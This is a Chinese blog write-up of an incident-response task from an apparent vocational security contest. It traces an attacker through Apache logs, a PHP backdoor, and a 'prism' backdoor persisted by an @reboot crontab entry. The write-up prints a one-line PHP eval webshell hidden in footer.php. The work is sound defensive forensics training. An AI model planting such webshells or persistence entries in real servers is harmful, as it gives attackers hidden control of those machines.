全国(山东、安徽)职业技能大赛--信息安全管理与评估大赛题目+答案讲解

🍬 博主介绍👨‍🎓 博主介绍:大家好,我是 hacker-routing ,很高兴认识大家~
✨主攻领域:【渗透领域】【应急响应】 【python】 【VulnHub靶场复现】【面试分析】
🎉点赞➕评论➕收藏 == 养成习惯(一键三连)😋
🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋
🙏作者水平有限,欢迎各位大佬指点,相互学习进步!

目录

第一部分 网络安全事件响应

任务1:应急响应

本任务素材清单:Server服务器虚拟机。

1.提交攻击者的IP地址

2.识别攻击者使用的操作系统

3.找出攻击者资产收集所使用的平台

4.提交攻击者目录扫描所使用的工具名称

5.提交攻击者首次攻击成功的时间,格式:DD /MM/YY:HH:MM:SS

6.找到攻击者写入的恶意后门文件,提交文件名(完整路径)和后门密码

7.找到攻击者隐藏在正常web应用代码中的恶意代码,提交该文件名(完整路径)

8.识别系统中存在的恶意程序进程,提交进程名

9.找到文件系统中的恶意程序文件并提交文件名(完整路径)

10.简要描述该恶意文件的行为


第一部分 网络安全事件响应

任务1:应急响应

A集团的WebServer服务器被黑客入侵,该服务器的Web应用系统被上传恶意软件,系统文件被恶意软件破坏,您的团队需要帮助该公司追踪此网络攻击的来源,在服务器上进行全面的检查,包括日志信息、进程信息、系统文件、恶意文件等,从而分析黑客的攻击行为,发现系统中的漏洞,并对发现的漏洞进行修复。

本任务素材清单:Server器虚

受攻击的Server服务器已整体打包成虚拟机文件保存,请选手自行导入分析。

注意:Server服务器的基本配置参见附录,若题目中未明确规定,请使用默认配置。

请按要求完成该部分的工作任务。

任务1:应急响应
任务编号任务描述
1提交攻击者的IP地址
2识别攻击者使用的操作系统
3找出攻击者资产收集所使用的平台
4提交攻击者目录扫描所使用的工具名称
5提交攻击者首次攻击成功的时间,格式:DD /MM/YY:HH:MM:SS
6找到攻击者写入的恶意后门文件,提交文件名(完整路径)和后门密码
7找到攻击者隐藏在正常web应用代码中的恶意代码,提交该文件名(完整路径)
8识别系统中存在的恶意程序进程,提交进程名
9找到文件系统中的恶意程序文件并提交文件名(完整路径)
10简要描述该恶意文件的行为

1.提交攻击者的IP地址

192.168.1.7

cd /var/log/apache2   ##Apache Web 服务器的访问日志文件error.log  ##Apache 服务器的一些操作通知和状态信息

然后在access.log.1文件里面发现了攻击者利用dirsearch扫描工具扫描

192.168.1.7user-agentDIRSEARCH,dirsearch是web目录扫描器。因此攻击者IP为192.168.1.7

2.识别攻击者使用的操作系统

Linux x86_64

##筛选出包含192.168.1.7这个IP地址的访问日志行
cat access.log.1 | grep 192.168.1.7 |more
cat access.log.1:使用cat命令显示access.log.1文件的全部内容。
grep 192.168.1.7:使用grep命令过滤包含192.168.1.7的行。
|:管道操作符,将cat access.log.1的输出作为grep 192.168.1.7的输入。
more:分页显示结果,以确保输出不会一次性显示所有结果。

3.找出攻击者资产收集所使用的平台

shodan

在任务二的基础上,我们再继续查看,可以看到:shodan 扫描器

GET / HTTP/1.1" 200 3663 "https://www.shodan.io/search?query=php

4.提交攻击者目录扫描所使用的工具名称

dirsearch

5.提交攻击者首次攻击成功的时间,格式:DD /MM/YY:HH:MM:SS

24/Apr/2022:15:26:35

cat access.log.1  ##查看日志内容

发现疑似攻击者上传一句话木马,并执行命令及反弹shell的操作。

验证一下,确实是后门

而我们看到,攻击者在24/Apr/2022:15:26:35该时间成功执行了命令,即该时间为首次攻击成功的时间

6.找到攻击者写入的恶意后门文件,提交文件名(完整路径)和后门密码

cat access.log.1 | grep 192.168.1.7 | grep ".php" | grep "200"

/var/www/html/data/avatar/1.php

密码为2022

7.找到攻击者隐藏在正常web应用代码中的恶意代码,提交该文件名(完整路径)

/var/www/html/footer.php

他这里提示:web应用代码中的恶意代码

所以在 /var/www/html 目录下面检索

grep 'eval(' -r /var/www/html//var/www/html/footer.php:@eval($_POST['catchmeifyoucan'])
grep命令用于在文件中搜索指定的模式。
'eval('是要搜索的模式,这里表示要搜索包含字符串eval(的行。
-r选项表示递归地搜索子目录。
/var/www/html/是要搜索的目录路径。

8.识别系统中存在的恶意程序进程,提交进程名

进程名:prism

ps aux
netstat -antu

没有发现什么特征的恶意程序和脚本文件

crontab -l   ##查看有哪些定时任务

通过查看定时任务,发现一个可疑的脚本文件:

@reboot cd /root/.mal/;./prism

crontab -l命令显示了当前用户的 cron 任务列表。在你的输入中,只有一项 cron 任务,即在系统每次启动时执行 /root/.mal/prism 命令。这个 cron 任务是通过 @reboot 定义的,意味着它会在系统启动时自动执行一次。更具体地说,它会先切换到 /root/.mal/ 目录,然后执行 ./prism 脚本。根据目前提供的信息来看,/root/.mal/prism 可能是一个可疑的文件路径,因为它位于 /root 目录下,而且命名中的 .mal 部分也可能表示恶意行为。请注意,我不能确认该文件是否恶意,因为我只能通过提供的文本进行分析。
root@webserver:/# cd /root/.mal
root@webserver:~/.mal# ls
prism
root@webserver:~/.mal# cat prism 

恶意脚本文件中,有可疑的内容

root@webserver:/# ps aux | grep "prism"

9.找到文件系统中的恶意程序文件并提交文件名(完整路径)

/root/.mal/prism

10.简要描述该恶意文件的行为

恶意行为:

每次系统重新启动,就会以root权限执行/root/.mal/prism脚本文件,从这里面的内容来看,这是恶意脚本文件是一个shell类的木马文件,这个是一个关于prism后门的恶意脚本

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/297860.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

方舟开发框架(ArkUI)概述

目录 1、基本概念 2、两种开发范式 3、开发框架的特性 4、UI开发(ArkTS声明式开发范式)概述 4.1、特点 4.2、整体架构 4.3、开发流程 方舟开发框架(简称ArkUI)为HarmonyOS应用的UI开发提供了完整的基础设施,包…

智能优化算法应用:基于食肉植物算法3D无线传感器网络(WSN)覆盖优化 - 附代码

智能优化算法应用:基于食肉植物算法3D无线传感器网络(WSN)覆盖优化 - 附代码 文章目录 智能优化算法应用:基于食肉植物算法3D无线传感器网络(WSN)覆盖优化 - 附代码1.无线传感网络节点模型2.覆盖数学模型及分析3.食肉植物算法4.实验参数设定5.算法结果6.…

ISP 状态机轮转和bubble恢复机制

1 ISP的中断类型 ISP中断类型 SOF: 一帧图像数据开始传输 EOF: 一帧图像数据传输完成 REG_UPDATE: ISP寄存器更新完成(每个reg group都有独立的这个中断) EPOCH: ISP某一行结尾(默认20)就会产生此中断 BUFFER DONE: 一帧图像数据ISP完全写到DDR了 2 ISP驱动状态机 通过camer…

java八股 redis

Redis篇-01-redis开篇_哔哩哔哩_bilibili 1.缓存穿透 2.缓存击穿 逻辑过期里的互斥锁是为了保证只有一个线程去缓存重建 3.缓存雪崩 4.双写一致性 4.1要求一致性(延迟双删/互斥锁) 延迟双删无法保证强一致性 那么前两步删缓和更新数据库哪个先呢&#xf…

车手互联是不是杀手锏,来听听一家头部手机厂的座舱方法论

作者 |Amy 编辑 |德新 十年前, 苹果CarPlay和谷歌Android Auto相继推出,手机与车机两个此前貌似无关的品类,从此开始产生交集。 科技巨头看好车机的硬生态,汽车大鳄们则垂涎于科技圈的软实力。 CarPlay和Android Auto的出现&am…

锐捷配置重发布RIP进OSPF中

一、实验拓扑 二、实验目的 使用两种动态路由协议,并使两种协议间的路由可以传递 三、实验配置 第一步:配置全网基本IP R1 Ruijie>enable Ruijie#configure terminal Ruijie(config)#interface gigabitEthernet 0/0 Ruijie(config-if-GigabitEthe…

使用 Postman 进行并发请求:实用教程与最佳实践

背景介绍 最近,我们发起了一个在线图书管理系统的项目。我负责的一个关键模块包括三个主要后台接口: 实现对books数据的检索。实施对likes数据的获取。通过collections端点访问数据。 应对高流量的挑战 在设计并部署接口时,我们不可避免地…

基于计算机视觉的棋盘图像识别

本期我们将一起学习如何使用计算机视觉技术识别棋子及其在棋盘上的位置 我们利用计算机视觉技术和卷积神经网络(CNN)为这个项目创建分类算法,并确定棋子在棋盘上的位置。最终的应用程序会保存整个图像并可视化的表现出来,同时输出…

Java多线程技术四——定时器

1 定时器的使用 在JDK库中Timer类主要负责计划任务的功能,也就是在指定的时间开始执行某一个任务,Timer类的方法列表如下: Timer类的主要作用就是设置计划任务,封装任务的类却是TimerTask,该类的结构如下图 因为TimerT…

Http---查看HTTP协议的通信过程

1. 谷歌浏览器开发者工具的使用 首先需要安装Google Chrome浏览器,然后Windows和Linux平台按F12调出开发者工具, mac OS选择 视图 -> 开发者 -> 开发者工具或者直接使用 altcommandi 这个快捷键,还有一个多平台通用的操作就是在网页右击选择检查。…

uni-app 工程目录结构介绍

锋哥原创的uni-app视频教程: 2023版uniapp从入门到上天视频教程(Java后端无废话版),火爆更新中..._哔哩哔哩_bilibili2023版uniapp从入门到上天视频教程(Java后端无废话版),火爆更新中...共计23条视频,包括:第1讲 uni…

Vue2从源码角度来回答一些常见的问题

1.请说一下Vue2响应式数据的理解(先知道基本的问题在哪里,源码的角度来回答,用的时候会有哪些问题) 可以监控一个数据的修改和获取操作。针对对象格式会给每个对象的属性进行劫持 Object.defineProperty 源码层面 initData ->…